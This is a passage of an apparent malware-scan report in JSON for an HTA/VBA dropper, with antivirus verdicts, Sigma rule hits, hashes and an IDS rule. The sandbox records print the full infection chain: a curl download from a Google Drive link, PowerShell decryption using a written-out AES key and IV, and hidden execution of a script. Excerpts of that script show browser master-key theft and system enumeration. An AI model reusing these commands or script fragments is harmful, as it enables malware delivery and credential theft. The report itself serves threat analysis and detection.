"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"CommandLine": "powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pipe.log'), 0, [System.IO.File]::ReadAllBytes('pipe.log').Length))\" ",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"CommandLine": "powershell Expand-Archive -Path pipe.zip ",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\pipe\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"CommandLine": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\pipe\\1.ps1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Get the processes that are running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "llName -Destination $destpath -ErrorAction SilentlyContinue\r\n\t\t\t} -ErrorAction SilentlyContinue\r\n\t\t}\r\n\t}\r\n}\r\n\r\nfunction GetBrowserData {\r\n\t$extensionpath = \"$storePath\\extensions.txt\"\r\n\t# Edge\r\n\ttry {\r\n\t\t$jsonContent = Get-Content -Path \"$localPath\\Microsoft\\Edge\\User Data\\Local State\" -Raw\r\n\t\t$jsonObject = $jsonContent | ConvertFrom-Json\r\n\t\tUnprotect-Data -encryptedData $jsonObject.os_crypt.encrypted_key -filePath \"$storePath\\edge_masterkey\"\r\n\r\n\t\t$edgeProcess = Get-Process -Name \"msedge\" -Error [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "2"
}
},
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "12efe08e-e053-4aa8-a966-3379bddceabd",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
}
],
"popular_threat_classification": {
"suggested_threat_label": "trojan.adfs/dwnldr",
"popular_threat_category": [
{
"count": 17,
"value": "trojan"
},
{
"count": 7,
"value": "dropper"
},
{
"count": 1,
"value": "downloader"
}
],
"popular_threat_name": [
{
"count": 2,
"value": "adfs"
},
{
"count": 2,
"value": "dwnldr"
},
{
"count": 1,
"value": "crit"
}
]
},
"vba_info": {
"strings": [
"&H137c8",
"&H2991",
"&Hf21e",
"&H16db6",
"&H10fd6",
"&H11e98",
"&H16516",
"&H167f2",
"&H150e",
"&H749",
"&H3133",
"&H103c2",
"&Haa04",
"&H83e6",
"&H11425",
"&Hfbd3",
"&Hc05d",
"&Hc05e",
"&H186e9",
"&H6b7a",
"&H6b7c",
"&H25f",
"&H92d",
"&H2dfb",
"&H5a89",
"&H12212",
"&Hc420",
"&Hcc2e",
"&H12bee",
"&H9f78",
"&H323f",
"&H60ab",
"&H5c4d",
"&H1221d",
"&Hb11e",
"&Hdda",
"&H925",
"&Hccef",
"&H155a4",
"&Hc514",
"&H4934",
"&H4240",
"&H9b12",
"&H7594",
"&H17edd",
"&H9e28",
"&H14ad3",
"&Hba05",
"&H906e",
"&H239f",
"&He267",
"&H11ebe",
"&H11ebc",
"&H1349d",
"&He460",
"&H1f6c",
"&H9c20",
"&H82cf",
"&H16e3a",
"&H3562",
"&Hf812",
"&H14adb",
"&H1277",
"&H1f61",
"&H1f60",
"&H1f65",
"&Hedc",
"&Hb480",
"&H15f3",
"&Hf0dc",
"&H3169",
"&H12141",
"&H6403",
"&H13492",
"&H17f0",
"&H1bcc",
"&H1189f",
"&H7a3f",
"&H11d29",
"&Hc99d",
"&Hc1df",
"&Hf4bb",
"&H813d",
"&H15fb2",
"&H3b4f",
"&H11b25",
"&H105e",
"&H10bed",
"&H17fb9",
"&Ha60d",
"&H22f3",
"&H3830",
"&Hc25",
"&H2c0",
"&H169e5",
"&H63dc",
"&H1464a",
"&He136",
"&H410a",
"&H8005",
"&H151f2",
"&Hdcc0",
"&H8008",
"&H14d74",
"&H17aea",
"&H10780",
"&H1154a",
"&H11094",
"&H3905",
"&H97dc",
"&H16a34",
"&Hdfec",
"&H201b",
"&H132f8",
"&Hd735",
"&H10d01",
"&H4a0",
"&H48b",
"&H2b20",
"&H5c5b",
"&Hc65b",
"&H4a3e",
"&H4a3a",
"&H4a3b",
"&H9a9f",
"&Hd6ab",
"&Hc29d",
"&Haad5",
"&H12d99",
"&Hae75",
"&H6f50",
"&Haf03",
"VBScript",
"&Hf170",
"&H4634",
"&Hae7b",
"&H151d",
"&H474a",
"&H12bd7",
"&H12bd1",
"&H160d6",
"&He736",
"&Ha34f",
"&H7ef6",
"&Hbdde",
"&Haba4",
"&H2aad",
"&H766a",
"&H425f",
"&Hf0e9",
"&H13301",
"&H13001",
"&H17a30",
"&H11a69",
"&H1244a",
"&Hc674",
"&H1266",
"&Hfd9b",
"&H10f32",
"&H12ff4",
"&H156f0",
"&H1750b",
"&H6eb5",
"&H12161",
"&H377a",
"&H1395f",
"&H13318",
"&H8e74",
"&Hb653",
"&H3174",
"&Hdbd9",
"&Ha631",
"&H13174",
"&H1704a",
"&H9833",
"&H9831",
"&H16ce0",
"&H8059",
"&He3e6",
"&Hb3cd",
"&H129aa",
"&H1688",
"&H151eb",
"&H16fbc",
"&Hcbaa",
"&H11dc9",
"&Hfe40",
"&H4f5a",
"&H3c7f",
"&Hb68",
"&H44a9",
"&H9f0",
"&H42cc",
"&H15de2",
"&H16fb3",
"&H84df",
"&H11205",
"&Hab94",
"&H3e67",
"&H1679f",
"&H121c0",
"&H11841",
"&Hd1b5",
"&H16311",
"&H16317",
"&H16315",
"&Hb81e",
"&H11442",
"&H5f90",
"&H14d6e",
"&Ha4dc",
"&H97eb",
"&H8bd",
"&H3cb3",
"&Hc443",
"&H2d30",
"&H150a7",
"&H4646",
"&H14cc7",
"&Hda5b",
"&H2ff7",
"&H2d3e",
"&H1600b",
"&H1738d",
"&H15e70",
"&Hbde1",
"&H100c5",
"&Haa2c",
"&H15e9c",
"&H3fbd",
"&H45b9",
"&H11bb6",
"&H10e36",
"&H12c1f",
"&H4c00",
"&Hc5fa",
"&H117a4",
"&Hcee3",
"&H13aa9",
"&H682d",
"&H94c0",
"&H8a49",
"&H8e6f",
"&Heeca",
"&Hbac2",
"&H3364",
"&Ha356",
"&H1212",
"&H1a9c",
"&H2092",
"&H10942",
"&Hd0ff",
"&H1278b",
"&H107a8",
"&Hf943",
"&H153a5",
"&H37c4",
"&H17d4",
"&H2784",
"&Hdbe7",
"&H4f6b",
"&Hed59",
"&H1fae",
"&H13e56",
"&H1511f",
"&H922b",
"&Hc2b4",
"&H1433a",
"&Hcf72",
"&H5526",
"&H11b01",
"&Hd9b4",
"&H71db",
"&Ha0e4",
"&H84e7",
"&H5780",
"&H982d",
"&H63f6",
"&H3b27",
"&H15757",
"&Ha2a",
"&H9958",
"&Hfa5b",
"&H129b8",
"&H151d0",
"&H129b6",
"cmd /c cd /d %localappdata% && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"&H16a19",
"&Hdcae",
"&H8971",
"&H182d4",
"&H1681d",
"&Hfd45",
"&H130de",
"&H13a7f",
"&H63f5",
"&H10ac8",
"&He845",
"&H87de",
"&H129bf"
]
},
"last_modification_date": 1781345471,
"times_submitted": 1,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260608",
"category": "malicious",
"result": "Trojan.Script.Generic.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Script.Agent"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.238",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5618",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260608",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20230417",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.57.59770",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.57.59769",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260609",
"category": "malicious",
"result": "Trojan.Generic.D262F828"
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1224",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Gen.NPE"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/TrojanDropper.Agent.PMU trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260610",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260610",
"category": "malicious",
"result": "HEUR:Trojan.Script.Generic"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Script.Dropper.kypbnp"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260610",
"category": "malicious",
"result": "Script.Trojan.Generic.Rgil"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/DwnLdr-ADFS"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260610",
"category": "malicious",
"result": "Dropper.DR/SNH"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260609",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260610",
"category": "malicious",
"result": "ti!3E9F88021FB7"
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260610",
"category": "malicious",
"result": "txt.trojan.generic"
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488 (B)"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "29d3768:29d3768:4ff9544:4ff9544",
"engine_update": "20260609",
"category": "malicious",
"result": "TrojanDropper/VBS.Runner.b!crit"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260610",
"category": "malicious",
"result": "DR/SNH"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38713",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26050.11",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan:Win32/Ravartar!rfn"
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS.S.Agent.58841"
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107407",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/DwnLdr-ADFS"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44856AVA:64.31389",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/Downldr.TI"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260610",
"category": "malicious",
"result": "Downloader/VBS.Generic"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-10.01",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260610",
"category": "malicious",
"result": "Dropper.Agent/VBS!1.137C0 (CLASSIC)"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260609",
"category": "malicious",
"result": "Trojan-Dropper.VBS.Agent"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/Agent.PMU!tr"
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[dropper]:Win/Generic.Gen"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": null,
"engine_update": "20260610",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260609-00",
"engine_update": "20260609",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": null,
"engine_update": "20260610",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.265",
"engine_update": "20260609",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.786",
"engine_update": "20260607",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260610",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.3.2",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260610",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
}
},
"meaningful_name": "d4498e6b-2232-4f15-bbc2-a8dae6303b85",
"unique_sources": 1,
"last_submission_date": 1778753102,
"size": 58841,
"magic": "HTML document, ASCII text, with CRLF line terminators",
"total_votes": {
"harmless": 0,
"malicious": 1
},
"type_tag": "vba",
"first_submission_date": 1778753102,
"type_description": "VBA",
"names": [
"d4498e6b-2232-4f15-bbc2-a8dae6303b85",
"pdfko[1].zip",
"sleestak_payload_1.hta",
"octet-stream"
],
"sha256": "3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8",
"md5": "0db53f4bbd5ca58c7a49994ca525ffcd",
"crowdsourced_ids_stats": {
"high": 0,
"medium": 1,
"low": 0,
"info": 0
},
"filecondis": {
"dhash": "e4e0a50084c6a0e0",
"raw_md5": "824daa5e89a99995b3d5d96a4327f4a8"
},
"ssdeep": "384:jstTWr8656/OMvhp4cFLraTrDIFP+SJtmjBe3Z8W0OLvZB0/HlBwTz1cfsdBBYGj:AtdJ51FLraTrkJt6IJ8WboflCLJSpXG",
"sha1": "df0ed60b6a989f51ac9cd6f367f25bd98c4bdd53",
"vhash": "cd87f260341667ed16d5513989cc815f",
"reputation": -1,
"type_tags": [
"source",
"vba",
"vbs"
],
"last_analysis_date": 1781068766,
"trid": [
{
"file_type": "file seems to be plain text/ASCII",
"probability": 0.0
}
],
"tlsh": "T17A4323428D383CED909F65A72DF310441192DE1A7FBB6473C12724B4193AAD87AE1EF6",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 4,
"medium": 9,
"low": 5
}
},
"sandbox_verdicts": {
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"crowdsourced_ids_results": [
{
"rule_category": "denial-of-service",
"alert_severity": "medium",
"rule_msg": "SERVER-OTHER Squid HTTP Vary response header denial of service attempt",
"rule_id": "1:41379",
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/downloads/#rule-downloads",
"rule_raw": "alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:\"SERVER-OTHER Squid HTTP Vary response header denial of service attempt\"; flow:to_client,established; http_header; content:\"Vary|3A|\"; content:!\"|0D 0A|\",within 250; metadata:policy max-detect-ips drop; service:http; reference:cve,2016-2569; reference:url,www.squid-cache.org/Advisories/SQUID-2016_2.txt; classtype:denial-of-service; sid:41379; rev:1; )",
"rule_references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-2569",
"https://www.squid-cache.org/Advisories/SQUID-2016_2.txt"
],
"alert_context": [
{
"src_ip": "74.125.205.94",
"src_port": 80
}
]
}
],
"magika": "VBA",
"last_analysis_stats": {
"malicious": 31,
"suspicious": 0,
"undetected": 29,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 1,
"type-unsupported": 14
},
"tags": [
"powershell",
"vba",
"run-file",
"obfuscated",
"enum-windows"
],
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 9,
"low": 5
}
}
}
}